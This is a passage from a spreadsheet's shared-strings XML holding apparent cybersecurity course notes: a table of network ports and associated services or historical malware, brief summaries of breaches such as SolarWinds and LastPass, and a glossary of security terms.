    <t>RIP</t>
  </si>
  <si>
    <t>Routing Information Protocol, used to find the optimal path between source and destination networks</t>
  </si>
  <si>
    <t>RIPng (IPv6)</t>
  </si>
  <si>
    <t>Routing Information Protocol next generation, the IPv6 compatible version of RIP</t>
  </si>
  <si>
    <t>UUCP</t>
  </si>
  <si>
    <t>Unix-to-Unix Copy Protocol</t>
  </si>
  <si>
    <t>AFP</t>
  </si>
  <si>
    <t>Apple Filing Protocol</t>
  </si>
  <si>
    <t>RTSP</t>
  </si>
  <si>
    <t>Real Time Streaming Protocol</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol version 6. DHCPv6 Clients listen for DHCPv6 messages on UDP port 546.</t>
  </si>
  <si>
    <t>rmonitor</t>
  </si>
  <si>
    <t>Remote Monitor</t>
  </si>
  <si>
    <t>NNTP over TLS/SSL</t>
  </si>
  <si>
    <t>Network News Transfer Protocol with encryption and verification</t>
  </si>
  <si>
    <t>For email message submission via SMTP</t>
  </si>
  <si>
    <t>FileMaker</t>
  </si>
  <si>
    <t>FileMaker Web Companion, the web publishing technology available in FileMaker versions 4-6</t>
  </si>
  <si>
    <t>Microsoft DCOM</t>
  </si>
  <si>
    <t>Distributed Component Object Model (DCOM)</t>
  </si>
  <si>
    <t>IPP</t>
  </si>
  <si>
    <t>Internet Printing Protocol</t>
  </si>
  <si>
    <t>LDAP over TLS/SSL</t>
  </si>
  <si>
    <t>MSDP (PIM)</t>
  </si>
  <si>
    <t>Multicast Source Discovery Protocol, which is part of the Protocol Independent Multicast (PIM) family</t>
  </si>
  <si>
    <t>LDP (MPLS)</t>
  </si>
  <si>
    <t>Label Distribution Protocol, applies to routers capable of Multiprotocol Label Switching (MPLS)</t>
  </si>
  <si>
    <t>Microsoft Exchange</t>
  </si>
  <si>
    <t>Microsoft Exchange Routing</t>
  </si>
  <si>
    <t>iSCSI</t>
  </si>
  <si>
    <t>Internet Small Computer Systems Interface</t>
  </si>
  <si>
    <t>rsync</t>
  </si>
  <si>
    <t>The rsync file synchronization protocol efficiently transfers and synchronizes files between devices and networked computers.</t>
  </si>
  <si>
    <t>VMware Server</t>
  </si>
  <si>
    <t>VMware ESXi, a hypervisor</t>
  </si>
  <si>
    <t>File Transfer Protocol (data) over TLS/SSL</t>
  </si>
  <si>
    <t>File Transfer Protocol (control) over TLS/SSL</t>
  </si>
  <si>
    <t>IMAP over SSL (IMAPS)</t>
  </si>
  <si>
    <t>Internet Message Access Protocol over TLS/SSL</t>
  </si>
  <si>
    <t>POP3 over SSL (POP3S)</t>
  </si>
  <si>
    <t>Post Office Protocol 3 over TLS/SSL</t>
  </si>
  <si>
    <t>Registered Ports: 1024 – 49151</t>
  </si>
  <si>
    <t>Microsoft RPC</t>
  </si>
  <si>
    <t>Microsoft Remote Procedure Call</t>
  </si>
  <si>
    <t>1026-1029</t>
  </si>
  <si>
    <t>Windows Messenger</t>
  </si>
  <si>
    <t>Windows Messenger popup spam</t>
  </si>
  <si>
    <t>SOCKS proxy</t>
  </si>
  <si>
    <t>TCP (or UDP since SOCKS5)</t>
  </si>
  <si>
    <t>SOCKS stands for Socket Secure. This protocol exchanges network packets between a client and server through a proxy server.</t>
  </si>
  <si>
    <t>MyDoom</t>
  </si>
  <si>
    <t>Computer virus</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>KAZAA</t>
  </si>
  <si>
    <t>A peer-to-peer file-sharing protocol</t>
  </si>
  <si>
    <t>Nessus Security Scanner</t>
  </si>
  <si>
    <t>Dell OpenManage</t>
  </si>
  <si>
    <t>Dell EMC OpenManage Server Administrator Web GUI</t>
  </si>
  <si>
    <t>WASTE</t>
  </si>
  <si>
    <t>WASTE peer-to-peer encrypted file-sharing Program</t>
  </si>
  <si>
    <t>Cisco VQP</t>
  </si>
  <si>
    <t>Cisco VLAN Query Protocol (VQP)</t>
  </si>
  <si>
    <t>L2TP VPN</t>
  </si>
  <si>
    <t>Layer Two Tunneling Protocol Virtual Private Networking</t>
  </si>
  <si>
    <t>Microsoft PPTP</t>
  </si>
  <si>
    <t>Point-to-Point Tunneling Protocol Virtual Private Networking</t>
  </si>
  <si>
    <t>Steam</t>
  </si>
  <si>
    <t>Valve Steam Client uses port 1725</t>
  </si>
  <si>
    <t>CiscoWorks SNMS 2000</t>
  </si>
  <si>
    <t>CiscoWorks Small Network Management Solution web server</t>
  </si>
  <si>
    <t>MMS</t>
  </si>
  <si>
    <t>Microsoft Media Server</t>
  </si>
  <si>
    <t>RADIUS server authentication and authorization</t>
  </si>
  <si>
    <t>RADIUS server accounting</t>
  </si>
  <si>
    <t>MSN Messenger, Xbox Live 360</t>
  </si>
  <si>
    <t>UPnP</t>
  </si>
  <si>
    <t>Universal Plug and Play</t>
  </si>
  <si>
    <t>Cisco HSRP</t>
  </si>
  <si>
    <t>Hot Standby Router Protocol</t>
  </si>
  <si>
    <t>Cisco SCCP</t>
  </si>
  <si>
    <t>Skinny Client Control Protocol</t>
  </si>
  <si>
    <t>Cisco ACS</t>
  </si>
  <si>
    <t>Access Control Server</t>
  </si>
  <si>
    <t>NFS</t>
  </si>
  <si>
    <t>Network File Sharing</t>
  </si>
  <si>
    <t>cPanel</t>
  </si>
  <si>
    <t>cPanel default</t>
  </si>
  <si>
    <t>radsec, cPanel</t>
  </si>
  <si>
    <t>Secure RADIUS Service (radsec), cPanel default SSL</t>
  </si>
  <si>
    <t>amiganetfs</t>
  </si>
  <si>
    <t>Amiga Network Filesystem</t>
  </si>
  <si>
    <t>DirectAdmin</t>
  </si>
  <si>
    <t>Graphical web hosting control panel</t>
  </si>
  <si>
    <t>Gaming</t>
  </si>
  <si>
    <t>The game HALO uses this port extensively</t>
  </si>
  <si>
    <t>Oracle</t>
  </si>
  <si>
    <t>Oracle database listening for insecure client connections to the listener, replaces port 1521</t>
  </si>
  <si>
    <t>Oracle database listening for SSL client connections to the listener</t>
  </si>
  <si>
    <t>Bagle.C – Bagle.H</t>
  </si>
  <si>
    <t>Computer worms</t>
  </si>
  <si>
    <t>Symantec AV</t>
  </si>
  <si>
    <t>Symantec System Center agent (SSC-AGENT)</t>
  </si>
  <si>
    <t>Interbase DB</t>
  </si>
  <si>
    <t>Borland Interbase database</t>
  </si>
  <si>
    <t>XBOX Live</t>
  </si>
  <si>
    <t>Gaming: Xbox LIVE and Games for Windows – Live</t>
  </si>
  <si>
    <t>Computer worm</t>
  </si>
  <si>
    <t>HTTP Proxy</t>
  </si>
  <si>
    <t>Common web proxy server ports: 80, 8080, 3128, 6588</t>
  </si>
  <si>
    <t>GLBP</t>
  </si>
  <si>
    <t>Gateway Load Balancing Protocol</t>
  </si>
  <si>
    <t>iSCSI Target</t>
  </si>
  <si>
    <t>Microsoft iSCSI Target Server</t>
  </si>
  <si>
    <t>MySQL</t>
  </si>
  <si>
    <t>MySQL database system</t>
  </si>
  <si>
    <t>DAAP</t>
  </si>
  <si>
    <t>Digital Audio Access Protocol, used by Apple’s iTunes and AirPort Express</t>
  </si>
  <si>
    <t>SVN</t>
  </si>
  <si>
    <t>Apache Subversion, a version control system</t>
  </si>
  <si>
    <t>World of Warcraft</t>
  </si>
  <si>
    <t>Some Blizzard games, Unofficial Club Penguin Disney online game for kids</t>
  </si>
  <si>
    <t>3784-3785</t>
  </si>
  <si>
    <t>Ventrilo VoIP</t>
  </si>
  <si>
    <t>Ventrilo’s Voice over Internet Protocol program</t>
  </si>
  <si>
    <t>mSQL</t>
  </si>
  <si>
    <t>Mini SQL server</t>
  </si>
  <si>
    <t>Blaster &amp;  Metasploit</t>
  </si>
  <si>
    <t>IPSec NAT Traversal</t>
  </si>
  <si>
    <t>Internet Protocol Security Network Address Translation (NAT) Traversal</t>
  </si>
  <si>
    <t>Google Desktop</t>
  </si>
  <si>
    <t>Google Desktop’s built-in HTTP server and indexing software</t>
  </si>
  <si>
    <t>eMule</t>
  </si>
  <si>
    <t>Peer-to-peer file-sharing software</t>
  </si>
  <si>
    <t>Radmin</t>
  </si>
  <si>
    <t>Remote computer control software</t>
  </si>
  <si>
    <t>iperf</t>
  </si>
  <si>
    <t>Tool for measuring TCP and UDP bandwidth performance</t>
  </si>
  <si>
    <t>5004-5005</t>
  </si>
  <si>
    <t>RTP, RTSP</t>
  </si>
  <si>
    <t>Real-time Transport Protocol, Real Time Streaming Protocol</t>
  </si>
  <si>
    <t>Yahoo! Messenger</t>
  </si>
  <si>
    <t>Instant messaging service from Yahoo</t>
  </si>
  <si>
    <t>SIP-TLS</t>
  </si>
  <si>
    <t>ICQ, AIM (AOL Instant Messenger), Apple iChat</t>
  </si>
  <si>
    <t>5222-5223</t>
  </si>
  <si>
    <t>XMPP</t>
  </si>
  <si>
    <t>Extensible Messaging and Presence Protocol Client Connection; also used in Google Talk, Jabber, Apple iChat, WhatsApp, etc.</t>
  </si>
  <si>
    <t>MDNS</t>
  </si>
  <si>
    <t>Multicast DNS</t>
  </si>
  <si>
    <t>PostgreSQL</t>
  </si>
  <si>
    <t>PostgreSQL database system</t>
  </si>
  <si>
    <t>Sasser</t>
  </si>
  <si>
    <t>5631-5632</t>
  </si>
  <si>
    <t>pcAnywhere</t>
  </si>
  <si>
    <t>Symantec pcAnywhere</t>
  </si>
  <si>
    <t>VNC over HTTP</t>
  </si>
  <si>
    <t>Virtual Network Computing (VNC)</t>
  </si>
  <si>
    <t>5900-5999</t>
  </si>
  <si>
    <t>RFB/VNC Server</t>
  </si>
  <si>
    <t>VNC Remote Frame Buffer RFB protocol</t>
  </si>
  <si>
    <t>X11</t>
  </si>
  <si>
    <t>X Window System protocol for delivering payloads between X clients and servers</t>
  </si>
  <si>
    <t>Diablo</t>
  </si>
  <si>
    <t>DameWare</t>
  </si>
  <si>
    <t>Remote access software developed by SolarWinds</t>
  </si>
  <si>
    <t>WinMX</t>
  </si>
  <si>
    <t>Windows Music Exchange, peer-to-peer file-sharing freeware</t>
  </si>
  <si>
    <t>6346-6347</t>
  </si>
  <si>
    <t>Gnutella2</t>
  </si>
  <si>
    <t>Peer-to-peer network protocol</t>
  </si>
  <si>
    <t>Redis</t>
  </si>
  <si>
    <t>Popular non-relational database management system (NoSql)</t>
  </si>
  <si>
    <t>GameSpy</t>
  </si>
  <si>
    <t>SANE</t>
  </si>
  <si>
    <t>Scanner Access Now Easy</t>
  </si>
  <si>
    <t>AnalogX</t>
  </si>
  <si>
    <t>AnalogX proxy server</t>
  </si>
  <si>
    <t>6665-6669</t>
  </si>
  <si>
    <t>6679, 6697</t>
  </si>
  <si>
    <t>IRC over SSL</t>
  </si>
  <si>
    <t>Napster</t>
  </si>
  <si>
    <t>Peer-to-peer file-sharing application</t>
  </si>
  <si>
    <t>6881-6999</t>
  </si>
  <si>
    <t>BitTorrent</t>
  </si>
  <si>
    <t>BitTorrent uses this range of ports the most often</t>
  </si>
  <si>
    <t>6891-6901</t>
  </si>
  <si>
    <t>Windows Live Messenger</t>
  </si>
  <si>
    <t>Alternatively: MSN Messenger</t>
  </si>
  <si>
    <t>Quicktime</t>
  </si>
  <si>
    <t>QuickTime streaming server</t>
  </si>
  <si>
    <t>Cassandra</t>
  </si>
  <si>
    <t>Inter-node communication within the cluster on Apache Cassandra</t>
  </si>
  <si>
    <t>SSL-enabled inter-node communication within the cluster on Apache Cassandra</t>
  </si>
  <si>
    <t>Cassandra JMX</t>
  </si>
  <si>
    <t>Java Management Extensions on Apache Cassandra</t>
  </si>
  <si>
    <t>7648-7649</t>
  </si>
  <si>
    <t>CU-SeeMe</t>
  </si>
  <si>
    <t>Internet video conferencing client made by Cornell University</t>
  </si>
  <si>
    <t>Internet Radio</t>
  </si>
  <si>
    <t>Commonly choice of alternate HTTP port for web applications</t>
  </si>
  <si>
    <t>Kaspersky AV</t>
  </si>
  <si>
    <t>Kaspersky AV Control Center</t>
  </si>
  <si>
    <t>Privoxy</t>
  </si>
  <si>
    <t>Advertisement-filtering Web proxy</t>
  </si>
  <si>
    <t>VMware vSphere Fault Tolerance</t>
  </si>
  <si>
    <t>VMware Server Management User Interface (insecure Web interface).</t>
  </si>
  <si>
    <t>Adobe ColdFusion, Flight Message Transfer Protocol</t>
  </si>
  <si>
    <t>Teamspeak</t>
  </si>
  <si>
    <t>VoIP communication system for online gaming</t>
  </si>
  <si>
    <t>Bagle.B</t>
  </si>
  <si>
    <t>Apache Cassandra, a NoSql database</t>
  </si>
  <si>
    <t>PDL</t>
  </si>
  <si>
    <t>PDL Data Stream, used for printing to certain network printers</t>
  </si>
  <si>
    <t>9101-9103</t>
  </si>
  <si>
    <t>Bacula</t>
  </si>
  <si>
    <t>For automating backup tasks</t>
  </si>
  <si>
    <t>MXit</t>
  </si>
  <si>
    <t>MXit Instant Messaging (deprecated)</t>
  </si>
  <si>
    <t>WebDAV</t>
  </si>
  <si>
    <t>Web-based Distributed Authoring and Versioning, an extension of HTTP</t>
  </si>
  <si>
    <t>Dabber</t>
  </si>
  <si>
    <t>Computer worm (Sasser)</t>
  </si>
  <si>
    <t>Urchin</t>
  </si>
  <si>
    <t>Urchin Web Analytics</t>
  </si>
  <si>
    <t>Network Data Management Protocol; applications: Webmin, BackupExec, Viatalk; gaming: The Matrix Online, Dungeon Fighter</t>
  </si>
  <si>
    <t>SNMP-agents (encrypted)</t>
  </si>
  <si>
    <t>SNMP-trap (encrypted)</t>
  </si>
  <si>
    <t>NetIQ</t>
  </si>
  <si>
    <t>NetIQ Endpoint</t>
  </si>
  <si>
    <t>NetIQ Qcheck</t>
  </si>
  <si>
    <t>NetIQ VoIP Assessor</t>
  </si>
  <si>
    <t>OpenPGP</t>
  </si>
  <si>
    <t>OpenPGP HTTP Keyserver</t>
  </si>
  <si>
    <t>NetBus</t>
  </si>
  <si>
    <t>NetBus remote administration tool (Trojan horse)</t>
  </si>
  <si>
    <t>13720-13721</t>
  </si>
  <si>
    <t>NetBackup</t>
  </si>
  <si>
    <t>NetBackup request daemon</t>
  </si>
  <si>
    <t>Battlefield</t>
  </si>
  <si>
    <t>Dipnet/Oddbob</t>
  </si>
  <si>
    <t>Trojan horse</t>
  </si>
  <si>
    <t>AdminSecure</t>
  </si>
  <si>
    <t>Panda Software AdminSecure Communication Agent</t>
  </si>
  <si>
    <t>Ensim</t>
  </si>
  <si>
    <t>Ensim Control Panel</t>
  </si>
  <si>
    <t>Usermin</t>
  </si>
  <si>
    <t>Web email interface for regular non-root users</t>
  </si>
  <si>
    <t>Synergy</t>
  </si>
  <si>
    <t>Keyboard/mouse sharing software</t>
  </si>
  <si>
    <t>Xfire</t>
  </si>
  <si>
    <t>Communication tool for gamers (deprecated)</t>
  </si>
  <si>
    <t>Half-Life</t>
  </si>
  <si>
    <t>MongoDB</t>
  </si>
  <si>
    <t>NoSql database</t>
  </si>
  <si>
    <t>Sub7</t>
  </si>
  <si>
    <t>Call of Duty</t>
  </si>
  <si>
    <t>Back Orifice</t>
  </si>
  <si>
    <t>Remote administration tool used for Trojan horses</t>
  </si>
  <si>
    <t>33434+</t>
  </si>
  <si>
    <t>traceroute</t>
  </si>
  <si>
    <t>Utility for displaying paths and measuring transit delays of packets across a network</t>
  </si>
  <si>
    <t>Case Study Name</t>
  </si>
  <si>
    <t>Type of Attack</t>
  </si>
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>SolarWinds Hack</t>
  </si>
  <si>
    <t>Password guessing
Password Spraying</t>
  </si>
  <si>
    <t>The US Cybersecurity and Infrastructure Security Agency (CISA) revealed that the threat actors responsible for the SolarWinds hack used password guessing and password spraying attacks, in addition to trojanized updates, to breach targets during their recent hacking campaign. Once inside, the hackers escalated access and forged authentication tokens to access resources without valid credentials, with a focus on cloud-hosted infrastructure, including Azure and Microsoft 365 environments, and CISA has released guidance for dealing with these attacks.</t>
  </si>
  <si>
    <t>LastPass Hack</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Installation on senior engineer's home computer </t>
  </si>
  <si>
    <t>LastPass experienced a security breach where an unauthorized party accessed a cloud storage service used for archived backups, potentially compromising customer data, but the company stated that customers' passwords remain encrypted and secure due to LastPass's Zero Knowledge architecture, and there is no evidence that customer data or encrypted vaults were accessed.</t>
  </si>
  <si>
    <t>CaesarPalace Hack</t>
  </si>
  <si>
    <t>Ransomware
Social Engineering Attack</t>
  </si>
  <si>
    <t>Hackers targeted Caesars Entertainment's loyalty program customers, stealing Social Security numbers and driver's license numbers. The breach was accomplished through a "social engineering attack" on an IT support contractor. MGM Resorts, which owns The Borgata in Atlantic City, also faced a similar cyberattack, disrupting its computer systems. A cybercriminal group known as Scattered Spider, which has been targeting casinos and hotels recently, is suspected to be behind these attacks, with concerns raised about their use of social engineering techniques to gain access to organizations.</t>
  </si>
  <si>
    <t>Optus Hack</t>
  </si>
  <si>
    <t>IT Term</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Availabiliity:</t>
  </si>
  <si>
    <t>Part of CIA triad concerned over allowing access to operating systems, equipment, and data, and limits access to those who require it.</t>
  </si>
  <si>
    <t>1.1 The Cybersecurity Mindset</t>
  </si>
  <si>
    <t>CIA Triad:</t>
  </si>
  <si>
    <t>The three cornerstones of information security.</t>
  </si>
  <si>
    <t>Confidentiality:</t>
  </si>
  <si>
    <t>Part of CIA triad that ensures that sensitive data does not reach unauthorised people.</t>
  </si>
  <si>
    <t>Cyber Security:</t>
  </si>
  <si>
    <t>Assessing threats and mitigating risks.</t>
  </si>
  <si>
    <t>Integrity:</t>
  </si>
  <si>
    <t>Part of CIA triad that protects information from being modified by unauthorized parties.</t>
  </si>
  <si>
    <t xml:space="preserve">Managing Risks: </t>
  </si>
  <si>
    <t>Fortifying a system or network and keeping bad actors out.</t>
  </si>
  <si>
    <t>Brute Force:</t>
  </si>
  <si>
    <t>A method of accessing an obstructed device by attempting multiple combinations of numeric/alphanumeric passwords.</t>
  </si>
  <si>
    <t>1.2 Attacking and Defending</t>
  </si>
  <si>
    <t>Code Injection:</t>
  </si>
  <si>
    <t>Attacks that inject code into an application, usually to acquire username and password fields.</t>
  </si>
  <si>
    <t>Credential Reuse:</t>
  </si>
  <si>
    <t xml:space="preserve">When an attacker uses the login credentials of a user from other sites to authenticate themselves. </t>
  </si>
  <si>
    <t>Default Credentials:</t>
  </si>
  <si>
    <t>Default login credentials to log into web applications</t>
  </si>
  <si>
    <t xml:space="preserve">Malware: </t>
  </si>
  <si>
    <t>Deployment of malicoious software such as spyware or keyloggers to capture daily user activitiy</t>
  </si>
  <si>
    <t>Man-in-the-middle:</t>
  </si>
  <si>
    <t xml:space="preserve"> An attack where the adversary positions himself in between the user and the system so that he can intercept and alter data traveling between them.</t>
  </si>
  <si>
    <t>OS Exploits:</t>
  </si>
  <si>
    <t xml:space="preserve">Incorrect patches resulting in OS breaches. </t>
  </si>
  <si>
    <t>Phishing Attack:</t>
  </si>
  <si>
    <t>An attacker takes victims to a redirected fake login page and captures the user credentials.</t>
  </si>
  <si>
    <t>Risk Mitigation:</t>
  </si>
  <si>
    <t>Systematic reduction of the impact and/or likely occurence of a negative event.</t>
  </si>
  <si>
    <t>Sniff Packet:</t>
  </si>
  <si>
    <t>Software that observes and records network traffic.</t>
  </si>
  <si>
    <t>Social Engineering Attack:</t>
  </si>
  <si>
    <t>An attacker asks users for their credentials by pretending to be an a known party.</t>
  </si>
  <si>
    <t>Stolen Hardware:</t>
  </si>
  <si>
    <t xml:space="preserve">Stealing hardware and using that information to acquire login data, etc. Saved Passwords. </t>
  </si>
  <si>
    <t>Threat Assessment:</t>
  </si>
  <si>
    <t>The structureed process of identifying the threats posed to a group.</t>
  </si>
  <si>
    <t>Career Development:</t>
  </si>
  <si>
    <t>Training of future cybersecurity professionals.</t>
  </si>
  <si>
    <t>1.3 Surveying the Cyberspace</t>
  </si>
  <si>
    <t>Database Attacks:</t>
  </si>
  <si>
    <t>Targetted attacks seeking to compromise and breach data and applications present on a server.</t>
  </si>
  <si>
    <t>Framework and Standards:</t>
  </si>
  <si>
    <t>Creation of new security frameworks and practices for professionals to follow.</t>
  </si>
  <si>
    <t>Governance:</t>
  </si>
  <si>
    <t xml:space="preserve">Framework for managing performance and risk, oversight of compliance and control responsibilities, and defining the cyber mission. </t>
  </si>
  <si>
    <t>Physical Security:</t>
  </si>
  <si>
    <t>Protection of personnel, hardware, data, networks, and software from threats.</t>
  </si>
  <si>
    <t>Risk Assessment:</t>
  </si>
  <si>
    <t>Analyzing what threats could pose a risk to an organisation.</t>
  </si>
  <si>
    <t>Security architecture:</t>
  </si>
  <si>
    <t>Security design that addresses the requirements and potential risks of a given scenario or environment.</t>
  </si>
  <si>
    <t>Security Operations:</t>
  </si>
  <si>
    <t>Process of intifying, containing, and remediating threats on behalf of a company or organization.</t>
  </si>
  <si>
    <t>Server Attacks:</t>
  </si>
  <si>
    <t>Threat Intelligence:</t>
  </si>
  <si>
    <t>Research and analysis of evidence-based knowledge regarding an existing of emerging menance.</t>
  </si>
  <si>
    <t>User Attacks:</t>
  </si>
  <si>
    <t>Targetted attacks focussing on exploiting user error.</t>
  </si>
  <si>
    <t>User Education:</t>
  </si>
  <si>
    <t>Teaching users how to protect themselves from cyber threats and how to secure their digital footprint.</t>
  </si>
  <si>
    <t>Web Attacks:</t>
  </si>
  <si>
    <t xml:space="preserve">Targetted attacks to gain unauthorized access or to compromise a web application. </t>
  </si>
  <si>
    <t>Incident Response Playbook:</t>
  </si>
  <si>
    <t>A predefined set of actions to address a specific security incident such as malware infection, violation of security policies, DDoS attack, etc. Its main goal is to enable a large enterprise security team to respond to cyberattacks in a timely and effective manner.</t>
  </si>
  <si>
    <t>Chief Executive Officer (CEO) :</t>
  </si>
  <si>
    <t>Responsible for plotting the overall direction of the company.</t>
  </si>
  <si>
    <t>2.1 Introduction to Security Within the Organization</t>
  </si>
  <si>
    <t>Chief Information Security Officer (CISO):</t>
  </si>
  <si>
    <t>Responsible for protecting the company's data.</t>
  </si>
  <si>
    <t>Compensating Security Controls:</t>
  </si>
  <si>
    <t>Restore the function of compromised systems.</t>
  </si>
  <si>
    <t>Compliance:</t>
  </si>
  <si>
    <t>Ensuring organisation is following internal security policies and adheres to relevant security laws.</t>
  </si>
  <si>
    <t>Control Diversity and Redundancy:</t>
  </si>
  <si>
    <t>A system with multiple layers of protection</t>
  </si>
  <si>
    <t>Corrective Security Controls:</t>
  </si>
  <si>
    <t>Attempt to fix an incident, and possibly stop it from happening again.</t>
  </si>
  <si>
    <t>Defence in Depth:</t>
  </si>
  <si>
    <t>The practice of using multiple defences to secure a resource.</t>
  </si>
  <si>
    <t>Detective Security Controls:</t>
  </si>
  <si>
    <t>Identifies and alert attempts to access a resource.</t>
  </si>
  <si>
    <t>Deterrent Security Controls:</t>
  </si>
  <si>
    <t>Discourage attackers from attempting to access a resource.</t>
  </si>
  <si>
    <t>Creating management processes for implementing security practices across the organisation.</t>
  </si>
  <si>
    <t>Preventative Security Controls:</t>
  </si>
  <si>
    <t>Prevent access with physical or technical barriers.</t>
  </si>
  <si>
    <t>Redundancy and Single Points of Failure:</t>
  </si>
  <si>
    <t>If one layer of security fails, the others will keep the system protected.</t>
  </si>
  <si>
    <t>Risk Management:</t>
  </si>
  <si>
    <t>Identifying an organisation's most important assets and determining how they may be compromised.</t>
  </si>
  <si>
    <t>Security Controls:</t>
  </si>
  <si>
    <t>Any system, process, or technology that protects the confidentiality, integrity, and availability of a resource.</t>
  </si>
  <si>
    <t>Security Culture:</t>
  </si>
  <si>
    <t>The way members of an organisation think about security measures. Employee security awareness is important.</t>
  </si>
  <si>
    <t>Security Culture Framework:</t>
  </si>
  <si>
    <t>Ensuring employees consider security important, and understand the security implications of their decisions.</t>
  </si>
  <si>
    <t>Annual Loss Expectancy (ALE):</t>
  </si>
  <si>
    <t xml:space="preserve">Estimated cost of a risk in a given year. ALE = SLE x ARO </t>
  </si>
  <si>
    <t>2.2 Risk Management and Threat Modelling</t>
  </si>
  <si>
    <t>Annual Rate of Occurrence (ARO):</t>
  </si>
  <si>
    <t>Estimated number of times the risk is likely to occur in a given year. ARO = Number of Occurrences / Years</t>
  </si>
  <si>
    <t>Asset Value:</t>
  </si>
  <si>
    <t>How much and asset is worth in currency.</t>
  </si>
  <si>
    <t>Develop:</t>
  </si>
  <si>
    <t>Strategies for monitoring or mitigation.</t>
  </si>
  <si>
    <t>Enumerate:</t>
  </si>
  <si>
    <t>Possible Risks, threats, and vulnerabilities to a company.</t>
  </si>
  <si>
    <t>Evaluate:</t>
  </si>
  <si>
    <t>The impact that the occurrence of a serious risk may have</t>
  </si>
  <si>
    <t>Exposure Factor:</t>
  </si>
  <si>
    <t>How much of an asset will be exposed in an event of a breach.</t>
  </si>
  <si>
    <t>Identify:</t>
  </si>
  <si>
    <t>The most likely and most serious risks.</t>
  </si>
  <si>
    <t>Loss Expectancy:</t>
  </si>
  <si>
    <t>The measure of how much money an organization will lose in the event of a breach.</t>
  </si>
  <si>
    <t>OWASP:</t>
  </si>
  <si>
    <t>PASTA:</t>
  </si>
  <si>
    <t>Process of Attack SimulationThreat and Analysis</t>
  </si>
  <si>
    <t>Qualitative Analysis:</t>
  </si>
  <si>
    <t>Focusses on hard, numerical data.</t>
  </si>
  <si>
    <t>Quantitative Analysis:</t>
  </si>
  <si>
    <t xml:space="preserve">Focuses on things that cannot be measured through numerical data. </t>
  </si>
  <si>
    <t>Risk:</t>
  </si>
  <si>
    <t xml:space="preserve">The possibility of losing something valuable. </t>
  </si>
  <si>
    <t>Risk Analysis:</t>
  </si>
  <si>
    <t>The process of prioritizing threats identified , their likelihood, and potential impact.</t>
  </si>
  <si>
    <t>Single Loss Expectancy (SLE):</t>
  </si>
  <si>
    <t>Estimated cost of the risk occurrence on a given asset. SLE = Asset Value x Exposure factor</t>
  </si>
  <si>
    <t>STRIDE:</t>
  </si>
  <si>
    <t>Spoofing Tampering Repudiation Information Disclosure DoS Elevation of Priviledge</t>
  </si>
  <si>
    <t>Threat:</t>
  </si>
  <si>
    <t>An actor that might exploit a vulnerability. ie Natural Disasters, Intentional, Unintentional</t>
  </si>
  <si>
    <t>Threat Modelling:</t>
  </si>
  <si>
    <t>Determining which attacks an organization is most likely to experience, who are the likely threats, and what prevention is needed.</t>
  </si>
  <si>
    <t>Vulnerability:</t>
  </si>
  <si>
    <t>An aspect of a business that can be exploited to compromise a system's CIA.</t>
  </si>
  <si>
    <t>Baseline:</t>
  </si>
  <si>
    <t>The most specific set of instructions or documents that contain configuration requirements.</t>
  </si>
  <si>
    <t>2.3 Governance Frameworks, Compliance, and BCP/DR</t>
  </si>
  <si>
    <t>Bring Your Own Device (BYOD):</t>
  </si>
  <si>
    <t>Policy of acceptable use of non-company owned devices.</t>
  </si>
  <si>
    <t>Business Continuity Planning (BCP):</t>
  </si>
  <si>
    <t>Focusses on processes and procedures to ensure business critical functions continue during and after a disaster.</t>
  </si>
  <si>
    <t>Business Impact Anlysis (BIA):</t>
  </si>
  <si>
    <t>Identifies key processes and functions of the business. Establish a detailed list of requirements for business recovery. Determine the resource requirements needed to resume key processes.</t>
  </si>
  <si>
    <t>Enforcing the policies in order to meet those standards.</t>
  </si>
  <si>
    <t>Contingency Policy Statement:</t>
  </si>
  <si>
    <t>Establishes the organisation's framework and responsibilities for maintaining CIA of data.</t>
  </si>
  <si>
    <t>Disaster Recovery (DR):</t>
  </si>
  <si>
    <t>Specific steps an organisations must take to resume work after a disaster.</t>
  </si>
  <si>
    <t>External / Imposed Goals :</t>
  </si>
  <si>
    <t>Targets that the business must hit because they will suffer consequences if they do not.</t>
  </si>
  <si>
    <t>Governance Framework::</t>
  </si>
  <si>
    <t>Rules and policies that must be followed by everyone in an organisation or industry.</t>
  </si>
  <si>
    <t>Guidelines:</t>
  </si>
  <si>
    <t xml:space="preserve">Designed to achieve policy objectives where factors may prevent rigid requirements.
</t>
  </si>
  <si>
    <t>Internal / Volitional Goals:</t>
  </si>
  <si>
    <t>Targets that the business sets in its own interest.</t>
  </si>
  <si>
    <t>Laws:</t>
  </si>
  <si>
    <t>Policies written in legal language, and voted upon and passed by legislative bodies of government.</t>
  </si>
  <si>
    <t>Maximum Tolerable (MTD):</t>
  </si>
  <si>
    <t>Maximum tolerable amount of time needed to bring all critical systems back online after a disaster occurs.</t>
  </si>
  <si>
    <t>National Institute of Standards and Technology (NIST):</t>
  </si>
  <si>
    <t>Federal agency within the United States Department of Commerce that  develop and promote standards, measurements, and technology that enhances productivity, facilitates trade, improves quality of life.</t>
  </si>
  <si>
    <t>Policies:</t>
  </si>
  <si>
    <t>Policies are high-level statements of management intent from an organization’s executive leadership that are designed to influence decisions and guide the organization to achieve the desired outcomes.</t>
  </si>
  <si>
    <t>Principles:</t>
  </si>
  <si>
    <t>The highest-level ideas and values of the policy pyramid that serve as reference points to guide organisational conduct.</t>
  </si>
  <si>
    <t>Procedures:</t>
  </si>
  <si>
    <t>Documented set of steps necessary to perform a specific task or process in conformance with an applicable standard.</t>
  </si>
  <si>
    <t>Recovery Point Objective (RPO):</t>
  </si>
  <si>
    <t xml:space="preserve">Amount of data that a business can afford to lose or recover (given the most recent backup copy of the data) after the disruption or system outage. </t>
  </si>
  <si>
    <t>Regulations:</t>
  </si>
  <si>
    <t>Detailed instructions on how laws should be enforced.</t>
  </si>
  <si>
    <t>Risk Management Framework (RMF):</t>
  </si>
  <si>
    <t>A set of standards developed by the National Institue of Standards and technology (NIST).</t>
  </si>
  <si>
    <t>Standards:</t>
  </si>
  <si>
    <t>Published specifications used to establish a common language and technical criteria across an organisations or industry.</t>
  </si>
  <si>
    <t>Work Recovery Time (WRT):</t>
  </si>
  <si>
    <t xml:space="preserve">Time available to get the systems working again. WRT is the remainder of the MTD after the RTO. If MTD is four days and RTO is one day, WRT is three days. </t>
  </si>
  <si>
    <t>Command Line:</t>
  </si>
